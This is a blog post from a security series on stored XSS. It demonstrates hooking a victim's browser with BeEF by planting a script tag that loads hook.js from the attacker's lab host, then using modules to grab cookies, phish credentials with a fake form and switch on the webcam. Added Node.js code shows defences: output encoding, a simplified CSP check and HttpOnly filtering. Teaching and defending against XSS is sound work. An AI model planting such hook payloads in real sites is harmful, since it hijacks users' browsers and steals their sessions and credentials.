A7 2017 – XSS (part 2)

Every public speech I make, every lecture I present, I always start with a demo. I know there are highly trained professionals out there with outstanding public speaking and presentation skills who write articles and books about the art of public speaking. But I guess for most of us it’s more about finding our own way of speaking to an audience.

I start with a demo because I think it makes people more involved. And demos of setting some system up, or of pentesting with visual results, are always entertaining and eye-catching for everybody in the room.

So, when it comes to a demo of XSS there’s no better example than using BeEF.

[image a7-11]

No, not that one. BeEF as in the Browser Exploitation Framework.

So, BeEF is a framework that makes it easy to demonstrate an XSS attack on a vulnerable web page. As we know, XSS occurs when we can run a malicious script in the context of a web page. BeEF supplies that script ready-made (hook.js) together with a front-end for working with the data the script collects. As soon as the script executes, BeEF has “hooked” the browser and can use it as a beachhead for launching any of its modules.

Let’s go back to our example from «A7 – Cross Site Scripting (XSS)» > «Persistent (Second Order)» > «Add to your blog». But this time we put the BeEF hook script into the blog post: the stored payload is a script tag whose src points at

http://192.168.19.128:3000/hook.js

The IP address is the host where BeEF is running; hook.js is served by the BeEF server itself (port 3000 by default). Now let’s switch to the BeEF UI:

[screenshot a7-12: BeEF UI]

Here we can see every browser that has loaded the hooked page, and here’s ours:

[screenshot a7-13]

We can get all the basic details about the victim’s browser on the Details tab:

[screenshot a7-16]

But what’s really interesting here is the Commands tab. It lists every module that ships with BeEF, and each one is colour-coded by how well it is expected to work against the hooked browser:

[screenshot a7-15]

So obviously some modules work against a given browser and some don’t. This is where the fun begins, as we can start running commands to demonstrate the severity of XSS. For example, we can easily grab the victim’s cookies for the hooked site (everything that document.cookie exposes, which excludes cookies flagged HttpOnly):

[screenshot a7-16]

and generate a fake authentication form to trick the victim into typing in his credentials:

[screenshot a7-17]

Or even turn on the web camera and see what is going on behind the keyboard on the other side (modern browsers do prompt the user for camera permission first, so this one is only as stealthy as the victim is careless):

[screenshot a7-18]

He-he, mine has been taped over for years now. How’s yours? =)
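Two things are worth pinning down before we wrap up, as an added example that is not part of the original post and not BeEF’s own code: what exactly had to be stored in the blog for hook.js to load, how output encoding and a Content-Security-Policy would each have stopped it, and what the cookie-stealing step can actually reach. The code runs under Node.js with no network; the blog origin `https://blog.example`, the policies and the Set-Cookie headers are constructed for the demo, and the CSP matcher implements only a subset of the real rules (an assumption, noted in the comments).

```javascript
// Added example for this post (not BeEF's own code): the stored payload that
// hooks the browser, the output-encoding fix, a CSP check, and the HttpOnly
// caveat for the cookie module. Node.js, no network; all inputs are constructed.

// Hook URL as in the post's lab; the IP and port are the post's own values.
const HOOK_URL = "http://192.168.19.128:3000/hook.js";
// What has to land in the rendered page for BeEF to hook the browser.
const STORED_PAYLOAD = `<script src="${HOOK_URL}"></script>`;

// 1. The blog's bug: the untrusted post body is concatenated straight into HTML.
function renderPostVulnerable(title, body) {
  return `<article><h2>${title}</h2><div class="body">${body}</div></article>`;
}

// The fix: encode the five characters that can change HTML context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderPostSafe(title, body) {
  return `<article><h2>${escapeHtml(title)}</h2><div class="body">${escapeHtml(body)}</div></article>`;
}

// Crude check used only by this example: is there a live <script> tag in the
// markup? (In a browser the HTML parser decides, not a regex.)
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// 2. Defence in depth: a simplified CSP script-src matcher. Supported subset
// (an assumption of this example, not full CSP3): 'none', 'self', '*', scheme
// sources such as "https:", and host sources [scheme://]host[:port] with an
// optional "*." prefix. Enough to show why script-src 'self' stops hook.js.
function cspAllowsScript(policy, pageOrigin, scriptUrl) {
  const directives = Object.fromEntries(
    policy.split(";").map((d) => d.trim()).filter(Boolean).map((d) => {
      const [name, ...srcs] = d.split(/\s+/);
      return [name.toLowerCase(), srcs];
    })
  );
  const sources = directives["script-src"] || directives["default-src"];
  if (!sources) return true;                 // no policy covers scripts: anything loads
  if (sources.includes("'none'")) return false;
  const DEFAULT_PORT = { "http:": "80", "https:": "443" };
  const page = new URL(pageOrigin);
  const script = new URL(scriptUrl);
  const scriptPort = script.port || DEFAULT_PORT[script.protocol] || "";
  return sources.some((src) => {
    if (src === "'self'") return script.origin === page.origin;
    if (src.startsWith("'")) return false;   // nonces, hashes, 'unsafe-inline': not URL matches
    if (src === "*") return ["http:", "https:", "ws:", "wss:"].includes(script.protocol);
    if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return script.protocol === src.toLowerCase();
    let scheme = null;
    let hostPort = src;
    if (src.includes("://")) { [scheme, hostPort] = src.split("://"); }
    if (scheme && scheme.toLowerCase() + ":" !== script.protocol) return false;
    const [host, port] = hostPort.split(":");
    const hostOk = host.startsWith("*.")
      ? script.hostname.endsWith(host.slice(1))
      : script.hostname === host.toLowerCase();
    // A source with no port only matches the default port of its scheme.
    const expectedPort = port || DEFAULT_PORT[scheme ? scheme.toLowerCase() + ":" : script.protocol] || "";
    const portOk = port === "*" || scriptPort === expectedPort;
    return hostOk && portOk;
  });
}

// 3. What the cookie module can actually reach: document.cookie never exposes
// cookies flagged HttpOnly. Given the server's Set-Cookie headers, list the
// names a hooked browser would hand over.
function cookiesReadableByScript(setCookieHeaders) {
  return setCookieHeaders.flatMap((header) => {
    const [pair, ...attrs] = header.split(";").map((s) => s.trim());
    const httpOnly = attrs.some((a) => a.toLowerCase() === "httponly");
    return httpOnly ? [] : [pair.split("=")[0]];
  });
}

// Stand-alone walk-through with constructed inputs.
function demo() {
  const blog = "https://blog.example";
  console.log("hook.js executes from vulnerable render:",
    containsScriptElement(renderPostVulnerable("hello", STORED_PAYLOAD)));
  console.log("hook.js executes from escaped render:   ",
    containsScriptElement(renderPostSafe("hello", STORED_PAYLOAD)));
  console.log("no CSP, hook.js allowed:", cspAllowsScript("", blog, HOOK_URL));
  console.log("script-src 'self', hook.js allowed:",
    cspAllowsScript("default-src 'self'; script-src 'self' cdn.example.com", blog, HOOK_URL));
  const setCookie = ["session=abc123; Path=/; HttpOnly; Secure", "PHPSESSID=c0ffee; Path=/", "theme=dark"];
  console.log("cookies BeEF could read:", cookiesReadableByScript(setCookie));
}
demo();
```

The point of the CSP part is that even with the stored script tag still in the page, `script-src 'self'` refuses to fetch hook.js from an origin the page does not list, so the browser never gets hooked; and the point of the cookie part is that what the cookie module shows you is exactly the set of cookies the application forgot to flag HttpOnly, which is the first thing to look at when the demo lands on a real target.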

So, how does it look? XSS is … well, “… a pathway to many abilities some consider to be unnatural”. You know who said that, right?
